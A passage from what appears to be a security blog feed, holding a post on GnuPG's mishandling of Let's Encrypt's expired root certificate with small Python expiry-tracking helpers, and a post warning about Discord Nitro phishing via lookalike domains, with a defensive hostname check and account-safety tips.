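from datetime import datetime

def days_until_expiry(not_after: str, now: datetime) -> int:
    """Parse a notAfter timestamp and return whole days until expiry.

    A negative result means the certificate has already expired, which
    is when browsers start warning that a site may not be secure."""
    expiry = datetime.strptime(not_after, "%b %d %H:%M:%S %Y %Z")
    return (expiry - now).days

# Let's Encrypt's old DST Root CA X3 root expired on September 30, 2021:
print(days_until_expiry("Sep 30 14:01:15 2021 GMT", datetime(2021, 9, 1)))
```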

GnuPG

GnuPG is a free implementation of the OpenPGP standard as defined by RFC 4880 (also known as PGP). GnuPG allows you to encrypt and sign your data and communications; it features a versatile key management system, along with access modules for all kinds of public key directories.

GnuPG is a command line tool without any graphical user interface that is often used as the actual crypto backend of other applications.

Even organizations that had not forgotten about the certificate expiration were caught out, because GnuPG did not handle it well. And since many were unaware that they were even using GnuPG, because it functions as the backend of another application, it took some organizations a while to figure out and correct the problem. Without knowing the cause, it’s a difficult problem to identify. For the affected companies, it’s not like everything is down, but they’re certainly having all sorts of service issues.

The update

The new version of GnuPG 2.2.32 (LTS) fixes the problem with Let’s Encrypt certificate chain validation, and this update should restore access to many web resources (e.g. Web Key Directory and key servers). “LTS” is short for long term support, and this series of GnuPG is guaranteed to be maintained at least until the end of 2024.

SSL/TLS certificate management

Digital certificates are the primary vehicle by which people and machines are identified and authenticated. As the number of identities in a company grows, so does the difficulty of managing and protecting certificates at scale. The adoption of BYOD and IoT makes certificate management more critical than ever.

Like passwords and keys, certificates also go through a cycle. They’re created, provisioned into the infrastructure, and have a finite validity period after which they expire. Certificate Management is usually concerned only with certificates issued by mutually trusted Certificate Authorities. Once the digital certificates have been issued, they must be managed diligently through their entire validity period.
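Diligent management mostly comes down to knowing what you have and when it expires. As a minimal sketch (the inventory structure and 30-day renewal window below are illustrative assumptions, not any particular product’s design), a tracking pass might look like:

```python
# Minimal sketch of an expiry-tracking pass over a certificate inventory.
# The inventory maps a certificate name to its expiry datetime; real
# tooling would pull these dates from the certificates themselves.
from datetime import datetime, timedelta

def expiring_soon(inventory: dict[str, datetime], now: datetime,
                  window_days: int = 30) -> list[str]:
    """Return the names of certificates expiring within the renewal
    window, soonest first, so they can be renewed before users see errors."""
    cutoff = now + timedelta(days=window_days)
    due = [(expiry, name) for name, expiry in inventory.items() if expiry <= cutoff]
    return [name for _, name in sorted(due)]
```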

If this incident has shown one thing, it is how important it is to keep track of all the digital certificates that your organization relies on.


Discord scammers lure victims with promise of free Nitro subscriptions

A number of bogus offers are doing the rounds in Discord land at the moment. Discord, a group text chat/VoiP app of choice for many gaming communities, is having a bit of trouble with phishing links.

You may recall we’ve covered a lot of Discord scams previously. Service users can create bots, those bots can be invited into channels, and then they get to work spamming. The messages run the range of free games, discount sign-ups for services, or just plain old fake login screens.

You’ll also frequently see bots pushing offers for things which simply don’t exist anymore. Their purpose is to hit the channels and drift forever, spamming all and sundry until they get a few hits. This week it’ll be a bot promoting a “red hot” offer from 2018. Next week it’ll be promoting crossover deals with a service which went out of business a year ago.

While many gamers who know their stuff won’t fall for those kinds of things, plenty of others will. They could stand to lose their gaming accounts, their logins for other services, some money, or perhaps a combination of all three. Depending on the scam, their accounts could also be used to send spam messages to an even bigger audience. You definitely don’t want any of this clogging up the channels you use on a daily basis.

What’s happening?

Spam messages are sent to other Discord users. As is common with this kind of attack, they’re themed around “Nitro”. This is a paid Discord service which offers added functionality in the servers along with some other features. At one point, games were included in some of these deals, and those were a big target for scammers even after the games were no longer available. The scammers are just banking on nobody checking before clicking the links.

Here’s what some of the current messages going around look like:

Note that this isn’t being sent from bots (as in, chatbots specifically coded to send spam links). As the Tweeter points out, this is all being sent by friends. Those friends have likely been compromised earlier in the chain, and are now being used for malicious purposes.

As for the messages themselves? They’re a mixed bunch. One claims a friend has sent the recipient a Nitro subscription. The others claim the recipient “has some Nitro left over”, tied to a URL which mentions billing and promotions.

When sneaky sites go phishing…

The sites here use a common trick: switching out the letter i for a lowercase L in the URL. As a result, you’re not visiting Discord, you’re visiting something along the lines of dLscord instead (we’re using an uppercase L here purely for visual clarity).

discord phish 1
Hunting for phish
discord phish 3
If it seems too good to be true…

From there, it’s a case of phishing the victim’s logins.
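This particular swap is mechanical enough that it can be caught programmatically. A minimal sketch, assuming a hand-maintained list of legitimate domains (the list below is illustrative, not Discord’s actual infrastructure):

```python
# Hypothetical lookalike check: does this hostname only match a known
# domain after undoing an i/l substitution? The LEGIT set is illustrative.
LEGIT = {"discord.com", "discord.gg"}

def looks_like_swap(hostname: str) -> bool:
    """True if the hostname is NOT a known domain, but becomes
    indistinguishable from one once the letters i and l are folded
    together, i.e. a likely dLscord-style lookalike."""
    host = hostname.lower()
    if host in LEGIT:
        return False  # the real thing
    fold = str.maketrans("li", "!!")  # collapse l and i into one placeholder
    return any(host.translate(fold) == legit.translate(fold) for legit in LEGIT)
```

Real homoglyph detection covers far more than one letter pair (rn for m, Cyrillic lookalikes, and so on), but the principle is the same: normalize the hostname, then compare it against a known-good list.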

Tackling the Discord phishers

Sometimes these sites already have multiple red flags thrown up along the way:

discord phish 2
Caught!

Other times, you’re reliant on the site being taken down or your security tools stopping the scam in its tracks. Either way, if you’ve entered your details into one of these sites (or similar!), then change your login as soon as possible.

How to protect your Discord account

Discord offers some tips on how to keep your account safe:

  1. Use a strong password, and one that is unique to your Discord account. A password manager can help generate and store strong passwords for you, because strong, unique passwords are very difficult to remember yourself
  2. Set up two-factor authentication (2FA) on your account
  3. Set up message scanning, which automatically scans and deletes any explicit content. You can choose to do this for all messages or just those from people not on your Friends List
  4. Block users if you need to. Discord offers more information on how to do that.

Stay safe out there!
